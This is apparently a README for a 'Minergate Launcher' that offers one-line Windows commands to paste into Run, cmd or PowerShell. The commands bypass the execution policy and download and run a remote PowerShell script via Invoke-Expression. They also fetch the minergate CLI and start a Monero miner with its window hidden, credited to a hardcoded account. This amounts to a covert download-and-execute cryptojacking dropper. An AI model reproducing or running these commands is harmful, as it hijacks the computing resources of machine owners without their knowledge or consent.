# Minergate Launcher

PowerShell script to execute minergate directly. Only for Windows

## How To Use It
> 3 clicks on the padding left of the code blocks select all the line

### Short Methods

Execute a remote file and execute the minergate-cli.exe file

#### With the Windows Run
* Open the Windows Start Menu and paste this the search bar
* Touch <kbd>Win + R</kbd> and paste this

```batch
cmd /c "pushd %HOMEPATH% && powershell -WindowStyle Hidden ""Set-ExecutionPolicy Bypass -Scope Process -Force;Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://bitbucket.org/pouletfrais/minergate-launcher/raw/master/miner.ps1'))"""
```

#### With PowerShell access

* Open the Windows Start Menu and paste this the search bar
  
```powershell
powershell -WindowStyle Hidden "Set-ExecutionPolicy Bypass -Scope Process -Force;Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://bitbucket.org/pouletfrais/minergate-launcher/raw/master/miner.ps1'))"
```

### Full Methods
Execute directly the minergate-cli program without the remote file

### With the Powershell

Paste directly this in the powershell window
```powershell
(New-Object System.Net.WebClient).DownloadFile('https://minergate.com/download/xfast-win-cli', 'a.zip');Expand-Archive a.zip -DestinationPath a;PowerShell.exe -windowstyle hidden {Start-Process a\minergate-cli.exe '-u canard2@protonmail.com --xmr 4 -g' -WindowStyle Hidden}
```

#### With the Command Line Prompt (cmd)

Paste directly this in the powershell window
```batch
powershell (New-Object System.Net.WebClient).DownloadFile('https://minergate.com/download/xfast-win-cli', 'a.zip');Expand-Archive a.zip -DestinationPath a;PowerShell.exe -windowstyle hidden {Start-Process a\minergate-cli.exe '-u canard2@protonmail.com --xmr 4 -g' -WindowStyle Hidden}
```

## Repository

`miner.ps1` is the full powershell script